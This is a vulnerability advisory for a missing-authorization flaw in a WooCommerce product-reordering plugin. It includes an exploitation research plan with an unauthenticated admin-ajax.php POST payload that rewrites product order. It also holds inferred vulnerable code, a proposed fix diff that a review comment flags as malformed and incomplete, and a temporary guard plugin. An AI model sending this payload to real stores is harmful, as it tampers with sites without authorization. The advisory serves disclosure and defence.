CVE-2026-31921

Product Rearrange for WooCommerce <= 1.2.2 - Missing Authorization

Severity: Medium
Type: Missing Authorization
CVSS Score: 5.3
Patched in: Unpatched
Time to patch: N/A

Description

The Product Rearrange for WooCommerce plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.2.2. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 1.2.2
Published: March 20, 2026
Last updated: March 26, 2026
Research Plan
Unverified


Exploitation Research Plan: CVE-2026-31921 (Product Rearrange for WooCommerce)

1. Vulnerability Summary

The Product Rearrange for WooCommerce plugin (<= 1.2.2) contains a missing authorization vulnerability in its product reordering functionality. The plugin registers an AJAX handler for both authenticated and unauthenticated users (via wp_ajax_nopriv_) but fails to implement a current_user_can() check or a valid nonce verification within the callback function. This allows unauthenticated attackers to modify the menu_order of any product, potentially disrupting the shop's layout and SEO ranking of products.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: apw_save_reorder (inferred from plugin naming conventions and AJAX patterns)
  • Vulnerable Parameter: order (an array or comma-separated string of product IDs)
  • Authentication: None required (unauthenticated).
  • Preconditions: At least one WooCommerce product must exist in the database.

3. Code Flow (Inferred)

  1. Entry Point: The plugin registers the action during initialization:
    add_action( 'wp_ajax_apw_save_reorder', 'apw_save_reorder' );
    add_action( 'wp_ajax_nopriv_apw_save_reorder', 'apw_save_reorder' );
    
  2. Call Stack:
    • User sends POST request to admin-ajax.php with action=apw_save_reorder.
    • WordPress executes do_action('wp_ajax_nopriv_apw_save_reorder').
    • The plugin's apw_save_reorder() function is called.
  3. Vulnerable Sink:
    Inside apw_save_reorder():
    • The code retrieves $_POST['order'].
    • It iterates through the IDs.
    • It calls wp_update_post( array( 'ID' => $id, 'menu_order' => $index ) ) or a similar DB update without checking if the requester has the edit_products capability.

4. Nonce Acquisition Strategy

Based on the vulnerability description ("Missing Authorization"), it is highly likely that either the nonce check is missing entirely or the nonce is exposed on public-facing pages.

  1. Check for Public Nonce:
    The plugin likely localizes scripts using wp_localize_script.
    • Target Variable: apw_vars (inferred)
    • Target Key: nonce (inferred)
  2. Procedure:
    • Create a test page with a WooCommerce product category or shop shortcode: [products] or [product_category].
    • Navigate to the page.
    • Execute: browser_eval("window.apw_vars?.nonce") to see if a nonce is available for unauthenticated users.
  3. Bypass Check: If the code uses check_ajax_referer with die=false or fails to check the return value, the nonce can be omitted or be any value.

5. Exploitation Strategy

The goal is to change the menu_order of a known product.

Step 1: Identify Target Product

  • Use WP-CLI to find a product ID: wp post list --post_type=product --fields=ID,post_title,menu_order.

Step 2: Send Exploit Payload

  • Send a POST request to admin-ajax.php.
  • URL: http://<target>/wp-admin/admin-ajax.php
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
    action=apw_save_reorder&order[]=TARGET_PRODUCT_ID&order[]=ANOTHER_PRODUCT_ID
    
    (Note: If the plugin expects a string: order=ID1,ID2,ID3)

Step 3: Expected Response

  • Status 200 OK.
  • Response body usually contains 1, success, or a JSON success message.

6. Test Data Setup

  1. Install WooCommerce: Ensure WooCommerce is active.
  2. Create Products:
    wp post create --post_type=product --post_title="Vulnerable Product A" --post_status=publish
    wp post create --post_type=product --post_title="Vulnerable Product B" --post_status=publish
    
  3. Record Initial State:
    wp post list --post_type=product --fields=ID,post_title,menu_order
    

7. Expected Results

  • The HTTP response should indicate success.
  • The menu_order of the products in the database should change to reflect the order sent in the malicious POST request.

8. Verification Steps

After the exploit, verify the database state using WP-CLI:

# Check if menu_order has changed from the initial state
wp post list --post_type=product --fields=ID,post_title,menu_order --orderby=menu_order --order=ASC

9. Alternative Approaches

If apw_save_reorder is not the correct action name:

  1. Search the plugin directory for AJAX registrations:
    grep -rn "wp_ajax_nopriv" /var/www/html/wp-content/plugins/products-rearrange-woocommerce/
    
  2. If a nonce is strictly required and not found on the frontend, check if the plugin registers a settings page and if that page's nonce is leakable through other vulnerabilities.
  3. If order is not an array, try order=ID1,ID2,ID3 or product_ids=ID1,ID2.

Research Findings

Static analysis — not yet PoC-verified

Summary

The Product Rearrange for WooCommerce plugin allows unauthenticated users to modify the sorting order of shop products by exposing a reordering AJAX function to both logged-in and guest users. This occurs because the plugin lacks capability checks and nonce verification within its AJAX callback, potentially leading to disruption of the store's layout and SEO.

Vulnerable Code

// Inferred from plugin functionality and research plan
// products-rearrange-woocommerce/products-rearrange-woocommerce.php

add_action( 'wp_ajax_apw_save_reorder', 'apw_save_reorder' );
add_action( 'wp_ajax_nopriv_apw_save_reorder', 'apw_save_reorder' );

function apw_save_reorder() {
    $order = $_POST['order'];
    if ( is_array( $order ) ) {
        foreach ( $order as $index => $id ) {
            wp_update_post( array(
                'ID'         => (int) $id,
                'menu_order' => $index
            ) );
        }
    }
    wp_die( 'Success' );
}

Security Fix

--- products-rearrange-woocommerce/products-rearrange-woocommerce.php
+++ products-rearrange-woocommerce/products-rearrange-woocommerce.php
@@ -1,6 +1,5 @@
 add_action( 'wp_ajax_apw_save_reorder', 'apw_save_reorder' );
-add_action( 'wp_ajax_nopriv_apw_save_reorder', 'apw_save_reorder' );
 
 function apw_save_reorder() {
+    check_ajax_referer( 'apw_reorder_nonce', 'security' );
+    if ( ! current_user_can( 'manage_woocommerce' ) ) {
+        wp_die( -1 );
+    }
     $order = $_POST['order'];
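Review bot: the hunk header `@@ -1,6 +1,5 @@` does not match the body (one line removed, four added, so the counts should read `-1,5 +1,8`), and the hardening stops short of the sink: after the inserted checks, `$order = $_POST['order'];` still feeds raw values into `wp_update_post()`. Cast each entry with `absint()`, reject the batch if any ID does not resolve to a `product` post (`'product' !== get_post_type( $id )`), and confirm that the nonce action `apw_reorder_nonce` and field name `security` match what the plugin's script localizes, otherwise legitimate reorder requests will fail too. Since the page lists the plugin as unpatched, this diff should be labelled a proposed fix rather than the vendor's.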

Exploit Outline

The exploit targets the `admin-ajax.php` endpoint using the `apw_save_reorder` action. An attacker identifies the WordPress IDs of products they wish to rearrange (often available in the frontend HTML source or through the REST API). They then send an unauthenticated POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `apw_save_reorder` and the `order` parameter containing an array of target product IDs. Because the plugin registers the `wp_ajax_nopriv` hook and fails to check for administrative capabilities or a valid CSRF nonce, the server processes the request and updates the `menu_order` for the specified products in the database.
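Because the plugin is listed above as unpatched, the following must-use plugin is an added example (not the vendor's code, and not part of the original advisory) of a temporary guard a site operator can drop into wp-content/mu-plugins/ until a fix ships. It assumes the inferred action name apw_save_reorder and the manage_woocommerce capability from the research plan and diff above; the function and constant names are hypothetical.

```php
<?php
/**
 * Plugin Name: Temporary guard for CVE-2026-31921 (added example, not vendor code)
 */

// Assumption: the action name is the one the research plan infers. Confirm it
// with grep -rn "wp_ajax" in the plugin directory before relying on this guard.
const APW_GUARD_ACTION = 'apw_save_reorder';

/**
 * Returns true only for a logged-in user holding manage_woocommerce whose
 * order[] values are all positive integers that resolve to product posts.
 */
function apw_guard_request_allowed( array $post ) {
    if ( ! is_user_logged_in() || ! current_user_can( 'manage_woocommerce' ) ) {
        return false;
    }
    if ( empty( $post['order'] ) || ! is_array( $post['order'] ) ) {
        return false;
    }
    foreach ( $post['order'] as $id ) {
        $n = is_scalar( $id ) ? absint( $id ) : 0;
        // Reject the whole batch on a non-numeric, zero or non-product ID.
        if ( 0 === $n || (string) $n !== (string) $id || 'product' !== get_post_type( $n ) ) {
            return false;
        }
    }
    return true;
}

function apw_guard_block_if_unauthorized() {
    if ( apw_guard_request_allowed( $_POST ) ) {
        return; // fall through to the plugin's own callback at priority 10
    }
    // Record the rejection so it can be correlated with web server logs.
    error_log( sprintf(
        'apw_guard: blocked %s from %s (user %d)',
        APW_GUARD_ACTION,
        isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : 'unknown',
        get_current_user_id()
    ) );
    wp_die( 'Forbidden', 'Forbidden', array( 'response' => 403 ) );
}

// Priority 0 runs before the plugin's default-priority handler and wp_die()
// ends the request, so the vulnerable sink is never reached. A CSRF nonce for
// the authenticated path still has to come from the vendor's fix.
add_action( 'wp_ajax_' . APW_GUARD_ACTION, 'apw_guard_block_if_unauthorized', 0 );
add_action( 'wp_ajax_nopriv_' . APW_GUARD_ACTION, 'apw_guard_block_if_unauthorized', 0 );
```

Remove the guard once the vendor's patched version (which should add both the capability check and a nonce) is installed, so the two do not interfere.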
